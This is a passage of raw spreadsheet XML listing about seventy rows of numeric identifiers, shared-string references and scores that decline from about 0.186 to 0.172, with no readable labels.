        <v>3.0858933E7</v>
      </c>
      <c r="C72" s="2" t="s">
        <v>62</v>
      </c>
      <c r="D72" s="2">
        <v>1.0</v>
      </c>
      <c r="E72" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F72" s="2">
        <v>0.1861111111111111</v>
      </c>
    </row>
    <row r="73" ht="15.75" customHeight="1">
      <c r="A73" s="1">
        <v>24110.0</v>
      </c>
      <c r="B73" s="2">
        <v>9878934.0</v>
      </c>
      <c r="C73" s="2" t="s">
        <v>64</v>
      </c>
      <c r="D73" s="2">
        <v>1.0</v>
      </c>
      <c r="E73" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F73" s="2">
        <v>0.1860670194003528</v>
      </c>
    </row>
    <row r="74" ht="15.75" customHeight="1">
      <c r="A74" s="1">
        <v>34157.0</v>
      </c>
      <c r="B74" s="2">
        <v>9878933.0</v>
      </c>
      <c r="C74" s="2" t="s">
        <v>64</v>
      </c>
      <c r="D74" s="2">
        <v>1.0</v>
      </c>
      <c r="E74" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F74" s="2">
        <v>0.1860670194003528</v>
      </c>
    </row>
    <row r="75" ht="15.75" customHeight="1">
      <c r="A75" s="1">
        <v>28779.0</v>
      </c>
      <c r="B75" s="2">
        <v>2.844023E7</v>
      </c>
      <c r="C75" s="2" t="s">
        <v>65</v>
      </c>
      <c r="D75" s="2">
        <v>1.0</v>
      </c>
      <c r="E75" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F75" s="2">
        <v>0.1854990583804143</v>
      </c>
    </row>
    <row r="76" ht="15.75" customHeight="1">
      <c r="A76" s="1">
        <v>29474.0</v>
      </c>
      <c r="B76" s="2">
        <v>3.2382393E7</v>
      </c>
      <c r="C76" s="2" t="s">
        <v>66</v>
      </c>
      <c r="D76" s="2">
        <v>1.0</v>
      </c>
      <c r="E76" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F76" s="2">
        <v>0.1854700854700855</v>
      </c>
    </row>
    <row r="77" ht="15.75" customHeight="1">
      <c r="A77" s="1">
        <v>30671.0</v>
      </c>
      <c r="B77" s="2">
        <v>4.2220952E7</v>
      </c>
      <c r="C77" s="2" t="s">
        <v>67</v>
      </c>
      <c r="D77" s="2">
        <v>1.0</v>
      </c>
      <c r="E77" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F77" s="2">
        <v>0.1845466155810983</v>
      </c>
    </row>
    <row r="78" ht="15.75" customHeight="1">
      <c r="A78" s="1">
        <v>22016.0</v>
      </c>
      <c r="B78" s="2">
        <v>2.9954723E7</v>
      </c>
      <c r="C78" s="2" t="s">
        <v>68</v>
      </c>
      <c r="D78" s="2">
        <v>1.0</v>
      </c>
      <c r="E78" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F78" s="2">
        <v>0.1843434343434344</v>
      </c>
    </row>
    <row r="79" ht="15.75" customHeight="1">
      <c r="A79" s="1">
        <v>22017.0</v>
      </c>
      <c r="B79" s="2">
        <v>2.9955924E7</v>
      </c>
      <c r="C79" s="2" t="s">
        <v>68</v>
      </c>
      <c r="D79" s="2">
        <v>1.0</v>
      </c>
      <c r="E79" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F79" s="2">
        <v>0.1843434343434344</v>
      </c>
    </row>
    <row r="80" ht="15.75" customHeight="1">
      <c r="A80" s="1">
        <v>29006.0</v>
      </c>
      <c r="B80" s="2">
        <v>2.9954722E7</v>
      </c>
      <c r="C80" s="2" t="s">
        <v>68</v>
      </c>
      <c r="D80" s="2">
        <v>1.0</v>
      </c>
      <c r="E80" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F80" s="2">
        <v>0.1843434343434344</v>
      </c>
    </row>
    <row r="81" ht="15.75" customHeight="1">
      <c r="A81" s="1">
        <v>29007.0</v>
      </c>
      <c r="B81" s="2">
        <v>2.9955923E7</v>
      </c>
      <c r="C81" s="2" t="s">
        <v>68</v>
      </c>
      <c r="D81" s="2">
        <v>1.0</v>
      </c>
      <c r="E81" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F81" s="2">
        <v>0.1843434343434344</v>
      </c>
    </row>
    <row r="82" ht="15.75" customHeight="1">
      <c r="A82" s="1">
        <v>29825.0</v>
      </c>
      <c r="B82" s="2">
        <v>3.5313604E7</v>
      </c>
      <c r="C82" s="2" t="s">
        <v>69</v>
      </c>
      <c r="D82" s="2">
        <v>1.0</v>
      </c>
      <c r="E82" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F82" s="2">
        <v>0.1842592592592593</v>
      </c>
    </row>
    <row r="83" ht="15.75" customHeight="1">
      <c r="A83" s="1">
        <v>27763.0</v>
      </c>
      <c r="B83" s="2">
        <v>2.3107575E7</v>
      </c>
      <c r="C83" s="2" t="s">
        <v>70</v>
      </c>
      <c r="D83" s="2">
        <v>1.0</v>
      </c>
      <c r="E83" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F83" s="2">
        <v>0.183982683982684</v>
      </c>
    </row>
    <row r="84" ht="15.75" customHeight="1">
      <c r="A84" s="1">
        <v>22228.0</v>
      </c>
      <c r="B84" s="2">
        <v>3.2382394E7</v>
      </c>
      <c r="C84" s="2" t="s">
        <v>66</v>
      </c>
      <c r="D84" s="2">
        <v>1.0</v>
      </c>
      <c r="E84" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F84" s="2">
        <v>0.1837606837606838</v>
      </c>
    </row>
    <row r="85" ht="15.75" customHeight="1">
      <c r="A85" s="1">
        <v>25182.0</v>
      </c>
      <c r="B85" s="2">
        <v>1.3123529E7</v>
      </c>
      <c r="C85" s="2" t="s">
        <v>71</v>
      </c>
      <c r="D85" s="2">
        <v>1.0</v>
      </c>
      <c r="E85" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F85" s="2">
        <v>0.1831275720164609</v>
      </c>
    </row>
    <row r="86" ht="15.75" customHeight="1">
      <c r="A86" s="1">
        <v>17517.0</v>
      </c>
      <c r="B86" s="2">
        <v>5.0037622E7</v>
      </c>
      <c r="C86" s="2" t="s">
        <v>72</v>
      </c>
      <c r="D86" s="2">
        <v>1.0</v>
      </c>
      <c r="E86" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F86" s="2">
        <v>0.1830601092896176</v>
      </c>
    </row>
    <row r="87" ht="15.75" customHeight="1">
      <c r="A87" s="1">
        <v>25595.0</v>
      </c>
      <c r="B87" s="2">
        <v>1.4377581E7</v>
      </c>
      <c r="C87" s="2" t="s">
        <v>73</v>
      </c>
      <c r="D87" s="2">
        <v>1.0</v>
      </c>
      <c r="E87" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F87" s="2">
        <v>0.1818873668188737</v>
      </c>
    </row>
    <row r="88" ht="15.75" customHeight="1">
      <c r="A88" s="1">
        <v>20751.0</v>
      </c>
      <c r="B88" s="2">
        <v>1.484401E7</v>
      </c>
      <c r="C88" s="2" t="s">
        <v>74</v>
      </c>
      <c r="D88" s="2">
        <v>1.0</v>
      </c>
      <c r="E88" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F88" s="2">
        <v>0.1817325800376648</v>
      </c>
    </row>
    <row r="89" ht="15.75" customHeight="1">
      <c r="A89" s="1">
        <v>20889.0</v>
      </c>
      <c r="B89" s="2">
        <v>1.6139329E7</v>
      </c>
      <c r="C89" s="2" t="s">
        <v>75</v>
      </c>
      <c r="D89" s="2">
        <v>1.0</v>
      </c>
      <c r="E89" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F89" s="2">
        <v>0.1815920398009951</v>
      </c>
    </row>
    <row r="90" ht="15.75" customHeight="1">
      <c r="A90" s="1">
        <v>21623.0</v>
      </c>
      <c r="B90" s="2">
        <v>2.4613693E7</v>
      </c>
      <c r="C90" s="2" t="s">
        <v>76</v>
      </c>
      <c r="D90" s="2">
        <v>1.0</v>
      </c>
      <c r="E90" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F90" s="2">
        <v>0.180365296803653</v>
      </c>
    </row>
    <row r="91" ht="15.75" customHeight="1">
      <c r="A91" s="1">
        <v>28066.0</v>
      </c>
      <c r="B91" s="2">
        <v>2.4613692E7</v>
      </c>
      <c r="C91" s="2" t="s">
        <v>76</v>
      </c>
      <c r="D91" s="2">
        <v>1.0</v>
      </c>
      <c r="E91" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F91" s="2">
        <v>0.180365296803653</v>
      </c>
    </row>
    <row r="92" ht="15.75" customHeight="1">
      <c r="A92" s="1">
        <v>22382.0</v>
      </c>
      <c r="B92" s="2">
        <v>3.517423E7</v>
      </c>
      <c r="C92" s="2" t="s">
        <v>77</v>
      </c>
      <c r="D92" s="2">
        <v>1.0</v>
      </c>
      <c r="E92" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F92" s="2">
        <v>0.1801075268817205</v>
      </c>
    </row>
    <row r="93" ht="15.75" customHeight="1">
      <c r="A93" s="1">
        <v>31350.0</v>
      </c>
      <c r="B93" s="2">
        <v>4985337.0</v>
      </c>
      <c r="C93" s="2" t="s">
        <v>78</v>
      </c>
      <c r="D93" s="2">
        <v>1.0</v>
      </c>
      <c r="E93" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F93" s="2">
        <v>0.1801075268817205</v>
      </c>
    </row>
    <row r="94" ht="15.75" customHeight="1">
      <c r="A94" s="1">
        <v>31994.0</v>
      </c>
      <c r="B94" s="2">
        <v>5.3316483E7</v>
      </c>
      <c r="C94" s="2" t="s">
        <v>79</v>
      </c>
      <c r="D94" s="2">
        <v>1.0</v>
      </c>
      <c r="E94" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F94" s="2">
        <v>0.1801075268817205</v>
      </c>
    </row>
    <row r="95" ht="15.75" customHeight="1">
      <c r="A95" s="1">
        <v>30560.0</v>
      </c>
      <c r="B95" s="2">
        <v>4.0785965E7</v>
      </c>
      <c r="C95" s="2" t="s">
        <v>80</v>
      </c>
      <c r="D95" s="2">
        <v>1.0</v>
      </c>
      <c r="E95" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F95" s="2">
        <v>0.1799336650082919</v>
      </c>
    </row>
    <row r="96" ht="15.75" customHeight="1">
      <c r="A96" s="1">
        <v>25849.0</v>
      </c>
      <c r="B96" s="2">
        <v>1.4844009E7</v>
      </c>
      <c r="C96" s="2" t="s">
        <v>74</v>
      </c>
      <c r="D96" s="2">
        <v>1.0</v>
      </c>
      <c r="E96" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F96" s="2">
        <v>0.17984934086629</v>
      </c>
    </row>
    <row r="97" ht="15.75" customHeight="1">
      <c r="A97" s="1">
        <v>29615.0</v>
      </c>
      <c r="B97" s="2">
        <v>3.3630015E7</v>
      </c>
      <c r="C97" s="2" t="s">
        <v>81</v>
      </c>
      <c r="D97" s="2">
        <v>1.0</v>
      </c>
      <c r="E97" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F97" s="2">
        <v>0.1795634920634921</v>
      </c>
    </row>
    <row r="98" ht="15.75" customHeight="1">
      <c r="A98" s="1">
        <v>21878.0</v>
      </c>
      <c r="B98" s="2">
        <v>2.7664869E7</v>
      </c>
      <c r="C98" s="2" t="s">
        <v>82</v>
      </c>
      <c r="D98" s="2">
        <v>1.0</v>
      </c>
      <c r="E98" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F98" s="2">
        <v>0.1794171220400729</v>
      </c>
    </row>
    <row r="99" ht="15.75" customHeight="1">
      <c r="A99" s="1">
        <v>20738.0</v>
      </c>
      <c r="B99" s="2">
        <v>1.4762855E7</v>
      </c>
      <c r="C99" s="2" t="s">
        <v>83</v>
      </c>
      <c r="D99" s="2">
        <v>1.0</v>
      </c>
      <c r="E99" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F99" s="2">
        <v>0.1790123456790124</v>
      </c>
    </row>
    <row r="100" ht="15.75" customHeight="1">
      <c r="A100" s="1">
        <v>22159.0</v>
      </c>
      <c r="B100" s="2">
        <v>3.1387761E7</v>
      </c>
      <c r="C100" s="2" t="s">
        <v>84</v>
      </c>
      <c r="D100" s="2">
        <v>1.0</v>
      </c>
      <c r="E100" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F100" s="2">
        <v>0.1790123456790124</v>
      </c>
    </row>
    <row r="101" ht="15.75" customHeight="1">
      <c r="A101" s="1">
        <v>31094.0</v>
      </c>
      <c r="B101" s="2">
        <v>4.8505825E7</v>
      </c>
      <c r="C101" s="2" t="s">
        <v>85</v>
      </c>
      <c r="D101" s="2">
        <v>1.0</v>
      </c>
      <c r="E101" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F101" s="2">
        <v>0.1788432267884323</v>
      </c>
    </row>
    <row r="102" ht="15.75" customHeight="1">
      <c r="A102" s="1">
        <v>20683.0</v>
      </c>
      <c r="B102" s="2">
        <v>1.4451605E7</v>
      </c>
      <c r="C102" s="2" t="s">
        <v>86</v>
      </c>
      <c r="D102" s="2">
        <v>1.0</v>
      </c>
      <c r="E102" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F102" s="2">
        <v>0.1787037037037037</v>
      </c>
    </row>
    <row r="103" ht="15.75" customHeight="1">
      <c r="A103" s="1">
        <v>29843.0</v>
      </c>
      <c r="B103" s="2">
        <v>3.564246E7</v>
      </c>
      <c r="C103" s="2" t="s">
        <v>87</v>
      </c>
      <c r="D103" s="2">
        <v>1.0</v>
      </c>
      <c r="E103" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F103" s="2">
        <v>0.1787037037037037</v>
      </c>
    </row>
    <row r="104" ht="15.75" customHeight="1">
      <c r="A104" s="1">
        <v>31064.0</v>
      </c>
      <c r="B104" s="2">
        <v>4.8027899E7</v>
      </c>
      <c r="C104" s="2" t="s">
        <v>88</v>
      </c>
      <c r="D104" s="2">
        <v>1.0</v>
      </c>
      <c r="E104" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F104" s="2">
        <v>0.1783625730994153</v>
      </c>
    </row>
    <row r="105" ht="15.75" customHeight="1">
      <c r="A105" s="1">
        <v>19199.0</v>
      </c>
      <c r="B105" s="2">
        <v>5.4985437E7</v>
      </c>
      <c r="C105" s="2" t="s">
        <v>89</v>
      </c>
      <c r="D105" s="2">
        <v>1.0</v>
      </c>
      <c r="E105" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F105" s="2">
        <v>0.17831541218638</v>
      </c>
    </row>
    <row r="106" ht="15.75" customHeight="1">
      <c r="A106" s="1">
        <v>21466.0</v>
      </c>
      <c r="B106" s="2">
        <v>2.2777733E7</v>
      </c>
      <c r="C106" s="2" t="s">
        <v>90</v>
      </c>
      <c r="D106" s="2">
        <v>1.0</v>
      </c>
      <c r="E106" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F106" s="2">
        <v>0.17831541218638</v>
      </c>
    </row>
    <row r="107" ht="15.75" customHeight="1">
      <c r="A107" s="1">
        <v>31651.0</v>
      </c>
      <c r="B107" s="2">
        <v>5.1591105E7</v>
      </c>
      <c r="C107" s="2" t="s">
        <v>91</v>
      </c>
      <c r="D107" s="2">
        <v>1.0</v>
      </c>
      <c r="E107" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F107" s="2">
        <v>0.17831541218638</v>
      </c>
    </row>
    <row r="108" ht="15.75" customHeight="1">
      <c r="A108" s="1">
        <v>27039.0</v>
      </c>
      <c r="B108" s="2">
        <v>2.0170252E7</v>
      </c>
      <c r="C108" s="2" t="s">
        <v>92</v>
      </c>
      <c r="D108" s="2">
        <v>1.0</v>
      </c>
      <c r="E108" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F108" s="2">
        <v>0.1782752902155888</v>
      </c>
    </row>
    <row r="109" ht="15.75" customHeight="1">
      <c r="A109" s="1">
        <v>22587.0</v>
      </c>
      <c r="B109" s="2">
        <v>3.903517E7</v>
      </c>
      <c r="C109" s="2" t="s">
        <v>84</v>
      </c>
      <c r="D109" s="2">
        <v>1.0</v>
      </c>
      <c r="E109" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F109" s="2">
        <v>0.1772486772486773</v>
      </c>
    </row>
    <row r="110" ht="15.75" customHeight="1">
      <c r="A110" s="1">
        <v>26975.0</v>
      </c>
      <c r="B110" s="2">
        <v>1.9708989E7</v>
      </c>
      <c r="C110" s="2" t="s">
        <v>93</v>
      </c>
      <c r="D110" s="2">
        <v>1.0</v>
      </c>
      <c r="E110" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F110" s="2">
        <v>0.1772486772486773</v>
      </c>
    </row>
    <row r="111" ht="15.75" customHeight="1">
      <c r="A111" s="1">
        <v>29340.0</v>
      </c>
      <c r="B111" s="2">
        <v>3.138776E7</v>
      </c>
      <c r="C111" s="2" t="s">
        <v>84</v>
      </c>
      <c r="D111" s="2">
        <v>1.0</v>
      </c>
      <c r="E111" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F111" s="2">
        <v>0.1772486772486773</v>
      </c>
    </row>
    <row r="112" ht="15.75" customHeight="1">
      <c r="A112" s="1">
        <v>30432.0</v>
      </c>
      <c r="B112" s="2">
        <v>3.9035169E7</v>
      </c>
      <c r="C112" s="2" t="s">
        <v>84</v>
      </c>
      <c r="D112" s="2">
        <v>1.0</v>
      </c>
      <c r="E112" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F112" s="2">
        <v>0.1772486772486773</v>
      </c>
    </row>
    <row r="113" ht="15.75" customHeight="1">
      <c r="A113" s="1">
        <v>31169.0</v>
      </c>
      <c r="B113" s="2">
        <v>4903933.0</v>
      </c>
      <c r="C113" s="2" t="s">
        <v>94</v>
      </c>
      <c r="D113" s="2">
        <v>1.0</v>
      </c>
      <c r="E113" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F113" s="2">
        <v>0.1772486772486773</v>
      </c>
    </row>
    <row r="114" ht="15.75" customHeight="1">
      <c r="A114" s="1">
        <v>30173.0</v>
      </c>
      <c r="B114" s="2">
        <v>3.7144386E7</v>
      </c>
      <c r="C114" s="2" t="s">
        <v>95</v>
      </c>
      <c r="D114" s="2">
        <v>1.0</v>
      </c>
      <c r="E114" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F114" s="2">
        <v>0.1765232974910395</v>
      </c>
    </row>
    <row r="115" ht="15.75" customHeight="1">
      <c r="A115" s="1">
        <v>30729.0</v>
      </c>
      <c r="B115" s="2">
        <v>4.3871512E7</v>
      </c>
      <c r="C115" s="2" t="s">
        <v>88</v>
      </c>
      <c r="D115" s="2">
        <v>1.0</v>
      </c>
      <c r="E115" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F115" s="2">
        <v>0.1764132553606239</v>
      </c>
    </row>
    <row r="116" ht="15.75" customHeight="1">
      <c r="A116" s="1">
        <v>29724.0</v>
      </c>
      <c r="B116" s="2">
        <v>3.4549687E7</v>
      </c>
      <c r="C116" s="2" t="s">
        <v>96</v>
      </c>
      <c r="D116" s="2">
        <v>1.0</v>
      </c>
      <c r="E116" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F116" s="2">
        <v>0.1762152777777778</v>
      </c>
    </row>
    <row r="117" ht="15.75" customHeight="1">
      <c r="A117" s="1">
        <v>26425.0</v>
      </c>
      <c r="B117" s="2">
        <v>1.7155444E7</v>
      </c>
      <c r="C117" s="2" t="s">
        <v>97</v>
      </c>
      <c r="D117" s="2">
        <v>1.0</v>
      </c>
      <c r="E117" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F117" s="2">
        <v>0.1757741347905283</v>
      </c>
    </row>
    <row r="118" ht="15.75" customHeight="1">
      <c r="A118" s="1">
        <v>31112.0</v>
      </c>
      <c r="B118" s="2">
        <v>4.86872E7</v>
      </c>
      <c r="C118" s="2" t="s">
        <v>98</v>
      </c>
      <c r="D118" s="2">
        <v>1.0</v>
      </c>
      <c r="E118" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F118" s="2">
        <v>0.1757741347905283</v>
      </c>
    </row>
    <row r="119" ht="15.75" customHeight="1">
      <c r="A119" s="1">
        <v>28866.0</v>
      </c>
      <c r="B119" s="2">
        <v>2.9073897E7</v>
      </c>
      <c r="C119" s="2" t="s">
        <v>99</v>
      </c>
      <c r="D119" s="2">
        <v>1.0</v>
      </c>
      <c r="E119" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F119" s="2">
        <v>0.1756535947712419</v>
      </c>
    </row>
    <row r="120" ht="15.75" customHeight="1">
      <c r="A120" s="1">
        <v>29585.0</v>
      </c>
      <c r="B120" s="2">
        <v>3.351107E7</v>
      </c>
      <c r="C120" s="2" t="s">
        <v>100</v>
      </c>
      <c r="D120" s="2">
        <v>1.0</v>
      </c>
      <c r="E120" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F120" s="2">
        <v>0.1755555555555556</v>
      </c>
    </row>
    <row r="121" ht="15.75" customHeight="1">
      <c r="A121" s="1">
        <v>24690.0</v>
      </c>
      <c r="B121" s="2">
        <v>1.1629001E7</v>
      </c>
      <c r="C121" s="2" t="s">
        <v>101</v>
      </c>
      <c r="D121" s="2">
        <v>1.0</v>
      </c>
      <c r="E121" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F121" s="2">
        <v>0.1753968253968254</v>
      </c>
    </row>
    <row r="122" ht="15.75" customHeight="1">
      <c r="A122" s="1">
        <v>23825.0</v>
      </c>
      <c r="B122" s="2">
        <v>8001452.0</v>
      </c>
      <c r="C122" s="2" t="s">
        <v>102</v>
      </c>
      <c r="D122" s="2">
        <v>1.0</v>
      </c>
      <c r="E122" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F122" s="2">
        <v>0.1744791666666667</v>
      </c>
    </row>
    <row r="123" ht="15.75" customHeight="1">
      <c r="A123" s="1">
        <v>25146.0</v>
      </c>
      <c r="B123" s="2">
        <v>1.3053143E7</v>
      </c>
      <c r="C123" s="2" t="s">
        <v>103</v>
      </c>
      <c r="D123" s="2">
        <v>1.0</v>
      </c>
      <c r="E123" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F123" s="2">
        <v>0.1744791666666667</v>
      </c>
    </row>
    <row r="124" ht="15.75" customHeight="1">
      <c r="A124" s="1">
        <v>33490.0</v>
      </c>
      <c r="B124" s="2">
        <v>8001451.0</v>
      </c>
      <c r="C124" s="2" t="s">
        <v>102</v>
      </c>
      <c r="D124" s="2">
        <v>1.0</v>
      </c>
      <c r="E124" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F124" s="2">
        <v>0.1744791666666667</v>
      </c>
    </row>
    <row r="125" ht="15.75" customHeight="1">
      <c r="A125" s="1">
        <v>30158.0</v>
      </c>
      <c r="B125" s="2">
        <v>3.704579E7</v>
      </c>
      <c r="C125" s="2" t="s">
        <v>104</v>
      </c>
      <c r="D125" s="2">
        <v>1.0</v>
      </c>
      <c r="E125" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F125" s="2">
        <v>0.1741996233521658</v>
      </c>
    </row>
    <row r="126" ht="15.75" customHeight="1">
      <c r="A126" s="1">
        <v>28554.0</v>
      </c>
      <c r="B126" s="2">
        <v>2.6874665E7</v>
      </c>
      <c r="C126" s="2" t="s">
        <v>105</v>
      </c>
      <c r="D126" s="2">
        <v>1.0</v>
      </c>
      <c r="E126" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F126" s="2">
        <v>0.173952641165756</v>
      </c>
    </row>
    <row r="127" ht="15.75" customHeight="1">
      <c r="A127" s="1">
        <v>33478.0</v>
      </c>
      <c r="B127" s="2">
        <v>7997292.0</v>
      </c>
      <c r="C127" s="2" t="s">
        <v>106</v>
      </c>
      <c r="D127" s="2">
        <v>1.0</v>
      </c>
      <c r="E127" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F127" s="2">
        <v>0.173952641165756</v>
      </c>
    </row>
    <row r="128" ht="15.75" customHeight="1">
      <c r="A128" s="1">
        <v>21625.0</v>
      </c>
      <c r="B128" s="2">
        <v>2.461937E7</v>
      </c>
      <c r="C128" s="2" t="s">
        <v>107</v>
      </c>
      <c r="D128" s="2">
        <v>1.0</v>
      </c>
      <c r="E128" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F128" s="2">
        <v>0.1738095238095239</v>
      </c>
    </row>
    <row r="129" ht="15.75" customHeight="1">
      <c r="A129" s="1">
        <v>29647.0</v>
      </c>
      <c r="B129" s="2">
        <v>3.3829702E7</v>
      </c>
      <c r="C129" s="2" t="s">
        <v>108</v>
      </c>
      <c r="D129" s="2">
        <v>1.0</v>
      </c>
      <c r="E129" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F129" s="2">
        <v>0.1738095238095239</v>
      </c>
    </row>
    <row r="130" ht="15.75" customHeight="1">
      <c r="A130" s="1">
        <v>33196.0</v>
      </c>
      <c r="B130" s="2">
        <v>7160654.0</v>
      </c>
      <c r="C130" s="2" t="s">
        <v>109</v>
      </c>
      <c r="D130" s="2">
        <v>1.0</v>
      </c>
      <c r="E130" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F130" s="2">
        <v>0.1738095238095239</v>
      </c>
    </row>
    <row r="131" ht="15.75" customHeight="1">
      <c r="A131" s="1">
        <v>20998.0</v>
      </c>
      <c r="B131" s="2">
        <v>1.7155445E7</v>
      </c>
      <c r="C131" s="2" t="s">
        <v>110</v>
      </c>
      <c r="D131" s="2">
        <v>1.0</v>
      </c>
      <c r="E131" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F131" s="2">
        <v>0.1737213403880071</v>
      </c>
    </row>
    <row r="132" ht="15.75" customHeight="1">
      <c r="A132" s="1">
        <v>22882.0</v>
      </c>
      <c r="B132" s="2">
        <v>4.7681423E7</v>
      </c>
      <c r="C132" s="2" t="s">
        <v>111</v>
      </c>
      <c r="D132" s="2">
        <v>1.0</v>
      </c>
      <c r="E132" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F132" s="2">
        <v>0.1737213403880071</v>
      </c>
    </row>
    <row r="133" ht="15.75" customHeight="1">
      <c r="A133" s="1">
        <v>29079.0</v>
      </c>
      <c r="B133" s="2">
        <v>3.0334325E7</v>
      </c>
      <c r="C133" s="2" t="s">
        <v>112</v>
      </c>
      <c r="D133" s="2">
        <v>1.0</v>
      </c>
      <c r="E133" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F133" s="2">
        <v>0.1733716475095786</v>
      </c>
    </row>
    <row r="134" ht="15.75" customHeight="1">
      <c r="A134" s="1">
        <v>25624.0</v>
      </c>
      <c r="B134" s="2">
        <v>1.4451604E7</v>
      </c>
      <c r="C134" s="2" t="s">
        <v>86</v>
      </c>
      <c r="D134" s="2">
        <v>1.0</v>
      </c>
      <c r="E134" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F134" s="2">
        <v>0.1731481481481482</v>
      </c>
    </row>
    <row r="135" ht="15.75" customHeight="1">
      <c r="A135" s="1">
        <v>26347.0</v>
      </c>
      <c r="B135" s="2">
        <v>1.6791955E7</v>
      </c>
      <c r="C135" s="2" t="s">
        <v>113</v>
      </c>
      <c r="D135" s="2">
        <v>1.0</v>
      </c>
      <c r="E135" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F135" s="2">
        <v>0.1731481481481482</v>
      </c>
    </row>
    <row r="136" ht="15.75" customHeight="1">
      <c r="A136" s="1">
        <v>26560.0</v>
      </c>
      <c r="B136" s="2">
        <v>1.780841E7</v>
      </c>
      <c r="C136" s="2" t="s">
        <v>114</v>
      </c>
      <c r="D136" s="2">
        <v>1.0</v>
      </c>
      <c r="E136" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F136" s="2">
        <v>0.1727430555555556</v>
      </c>
    </row>
    <row r="137" ht="15.75" customHeight="1">
      <c r="A137" s="1">
        <v>21272.0</v>
      </c>
      <c r="B137" s="2">
        <v>2.0188773E7</v>
      </c>
      <c r="C137" s="2" t="s">
        <v>115</v>
      </c>
      <c r="D137" s="2">
        <v>1.0</v>
      </c>
      <c r="E137" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F137" s="2">
        <v>0.172316384180791</v>
      </c>
    </row>
    <row r="138" ht="15.75" customHeight="1">
      <c r="A138" s="1">
        <v>27041.0</v>
      </c>
      <c r="B138" s="2">
        <v>2.0188772E7</v>
      </c>
      <c r="C138" s="2" t="s">
        <v>115</v>
      </c>
      <c r="D138" s="2">
        <v>1.0</v>
      </c>
      <c r="E138" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F138" s="2">
        <v>0.172316384180791</v>
      </c>
    </row>
    <row r="139" ht="15.75" customHeight="1">
      <c r="A139" s="1">
        <v>28114.0</v>
      </c>
      <c r="B139" s="2">
        <v>2.4657323E7</v>
      </c>
      <c r="C139" s="2" t="s">
        <v>116</v>
      </c>
      <c r="D139" s="2">
        <v>1.0</v>
      </c>
      <c r="E139" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F139" s="2">
        <v>0.172316384180791</v>
      </c>
    </row>
    <row r="140" ht="15.75" customHeight="1">
      <c r="A140" s="1">
        <v>32291.0</v>
      </c>
      <c r="B140" s="2">
        <v>5.5470801E7</v>
      </c>
      <c r="C140" s="2" t="s">
        <v>117</v>
      </c>
      <c r="D140" s="2">
        <v>1.0</v>
      </c>
      <c r="E140" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F140" s="2">
        <v>0.172316384180791</v>
      </c>
    </row>
    <row r="141" ht="15.75" customHeight="1">
      <c r="A141" s="1">
        <v>23054.0</v>
      </c>
      <c r="B141" s="2">
        <v>5.0261245E7</v>
      </c>
      <c r="C141" s="2" t="s">
        <v>118</v>
      </c>
      <c r="D141" s="2">
        <v>1.0</v>
      </c>
      <c r="E141" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F141" s="2">
        <v>0.1722222222222223</v>
      </c>
    </row>
    <row r="142" ht="15.75" customHeight="1">
      <c r="A142" s="1">
        <v>24788.0</v>
      </c>
